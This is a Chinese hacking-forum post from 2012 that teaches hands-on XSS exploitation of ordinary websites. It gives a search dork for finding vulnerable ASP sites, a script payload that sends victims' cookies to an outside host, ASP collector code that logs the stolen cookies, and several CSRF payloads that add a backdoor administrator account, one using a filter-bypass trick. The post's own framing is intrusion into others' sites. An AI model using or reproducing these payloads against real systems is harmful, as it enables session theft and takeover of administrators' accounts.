找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1839|回复: 0
打印 上一主题 下一主题

实战xss漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:08:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为:
$ t: X/ Z. Y5 s/ f* A. g5 x4 y+ e# _2 c1 g/ {* |7 j
http://tieba.baidu.com/f?kz=1069007239, {6 O1 w- ?$ c2 C
& p3 Z) y" o. E  s6 i
这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。
% l4 |1 K& E) S* X5 S( ~& A/ o1 F) ~' I% L
但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。
9 I* K4 _, [$ K4 D' z- y+ d5 @/ Q/ z
我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。
0 \; S) I* I4 o; d1 t. v
& T  l* l0 c7 r5 _2 ^$ X这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。7 R4 F; W* j4 V9 O
+ }; w/ t$ n/ h1 |5 O2 P
好了,废话不多说了,一起来看文章吧。
+ E' t# q2 v0 q
% S% g4 J0 q6 i7 Q-------------------------------------------------------------------0 V* I  \! I1 F, S
. U' V' \% E2 s0 [
首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。& M! a& ]6 h! d+ R

: A2 h* H* C5 [. i4 M1 K( X
/ S; U0 F- }6 a9 G  m, \
8 ?# t: C$ t- c' W6 _0 ~再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:9 k. P% m, t: ^$ _: n% Y# t7 ^

6 u/ v" R4 n8 m. A! Z
, _2 U  C2 m: B1 `5 x7 I9 }$ R% \
( s3 u7 j* N  Z# }1 Q; R这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是
& u  F% Y0 J6 ~* ]0 K+ U9 {1:让目标访问已跨站的网址,然后这个网址执行脚本
7 }: j( X6 I0 y- Z; T2 ?2:然后跳转到你已经写好专门用来收集Cookie的网址
. r; g; H6 i1 w, D  H9 M. \) _9 L8 T: ]! y3 w+ K+ A* w
具体实现方法:* o. @  N7 _  [9 i% `/ x
先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>/ p1 R# @' W8 s- P% t
这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。9 i. x3 |/ w" T- D# H& h$ \  ?
& `& ]4 `# M% A( E) M% c
这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
! \% E& I' v6 [5 C! X- `0 C
9 z& H* M, P0 G5 u* o0 b<html>
! d8 l2 [  V8 j& g' {5 T<title>xx</title>
6 T! N: U& O: J4 j. U3 S5 Q<body>
! {6 G$ y2 N/ ~* h3 j<%
% p6 F! S: M5 ]. t# V; ktestfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
& x% I8 b( ]  u0 e( d& ]. J9 C: Zmsg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
4 d0 @8 ~+ h6 B- S- zset fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象5 n7 A0 d0 ]+ H" G9 Q0 u
set thisfile = fs.OpenTextFile(testfile,8,True,0). d) ~1 x2 L6 h6 R( o" [
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie6 T5 z) d, `! V. f5 X
thisfile.close   //关闭: m6 ~% b2 [- A5 H
set fs = nothing. n# m& S* r  {, q$ h1 @
%>
7 o: v$ p/ \- ^</body>
, W: b# K& v: N6 e- ]; d3 m" W</html>' S$ K4 j8 l" S3 K

; F  I. ]2 ]% {" x, E9 ^然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:( [1 n$ N) a2 ?5 o0 a, F) T

5 e2 w, i7 A" J * m1 v5 N% w, t5 X# y

+ f) J- z; J7 ~" p
# ]% ]& @, m# Q3 q6 H$ O拿出来看看,呵呵,Cookie到手:/ `3 c* e' [7 V; ]

1 w& A! G" `1 u1 o( f# u
. |" I. E" I, U4 G, v7 t, h  F. G! k" ]$ T: q% H1 o: [; e" ~$ R
本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~+ R6 x( V* q& t" j- Q4 u( @

4 B8 u) ?# s5 a# XPS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。5 y, S6 N/ Z( G0 o
- ^. Y6 O  R  Z9 Y  _. @
-------------------------------------------------------------------
$ t; j9 N  h/ A# c) Z1 s9 m- N6 \3 {9 @6 N$ m8 Q
下面是我对这个帖子的回复,也一起贴过来吧:- B% g2 D3 B, L9 e. G
2 }/ P! C5 |- ^( ]( \
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。$ t, M) W; {# W0 ?: u' f1 Z

! X0 N* R2 W' X- A但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。
3 E* A8 s  }! z再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。
6 m2 B4 ]( I) O) S0 u) f* P8 {* Q7 b$ r7 `" z" N
在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:
$ a; X0 [, M7 l0 f4 X0 a  K' f4 e- |! s. b- \1 T: ~
http://user.qzone.qq.com/673116767/blog/1252452536+ N$ |+ L# x! }; Y; e; }- ]

  O/ v( m6 V& o8 k2 ]3 T一般发现一个xss漏洞后要做的基本上就是这些:& L9 G. Y. t" W
- n; r, Z; N% b
1.  伪造请求  使用$_REQUEST或$_GET( ^9 l! Z# u; a% o+ H

+ C* j- K  v& x8 S- ?首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:1 \- L3 M" M# `$ H
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />/ {) \" s$ `3 z) B
当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。7 [+ u! ~! z) F/ w
8 h  x5 n" Q8 w, d: B
如果是可视文本编辑器,可以尝试使用输入:: F$ a4 S1 T2 U! G$ b
http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
6 L: ]8 n8 e4 N6 B. @这样最终会构造出:! h* b! r4 C3 D! r1 O# p2 f& y
<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />& _/ N& n& u& R( H
总之要举一反三。
. k1 e5 o. U) E0 \5 A; e- H8 I
2. 伪造请求  使用$_POST
* ?1 `/ e4 G3 u7 d: g7 |+ l. h) }8 p: v$ k& P# x) o* U( Z
当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:
& m! Q8 S3 O& E<sc/*xss*/ript type="text/javascript">
0 y) _1 Y6 P$ `9 j5 [var aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
3 E* B( T: J0 a7 d9 o* Maj.open("POST", "/admin/admin_add.asp", false);
- o4 ]8 Y, W5 ]) j2 {) w1 s/ P: m5 d( Zvar postdata = 'name=xxx&psd=yyy';  }/ Z: q" _+ Z5 U* U7 ?6 O
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); & K9 f1 \7 \! \3 l
aj.send(postdata);
- a  R9 K/ E! A</scr/*xss*/ipt>) n) J$ g+ r" l2 a- ?
/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。8 \2 ~* p. J( I5 |
' C. l0 C. U# A0 e* V
3. 跨站伪造请求 使用$_GET 或 $_REQUEST% F( F: |1 G8 ~6 X  H
/ e& e: ~" R' ^
与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片9 I; G) Y+ ^/ X
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/># S1 i  c  V3 @9 E9 _) C9 Q
然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
0 r, g- b& O" {/ V  r& c7 r) Y/ ~. H- ]: i3 p* U3 }
4.跨站伪造请求 使用$_POST(0day)
# @4 v/ \* c! V1 z6 b8 h3 y; w
$ a, I: k' p! q# w2 a如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。
( {% D/ o9 n# j! @# x  c7 q5 C! }8 b8 x, K" L" A% E
但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。( R, ?8 K7 n- P8 r
3 k2 c" c' d* s$ B( H  i6 `
总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。
+ z. a# V: t  s4 ?9 j* `& _! c8 J. e3 {
OK,该说的都说完了,Over。
9 N6 |& P/ D/ X4 n  s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表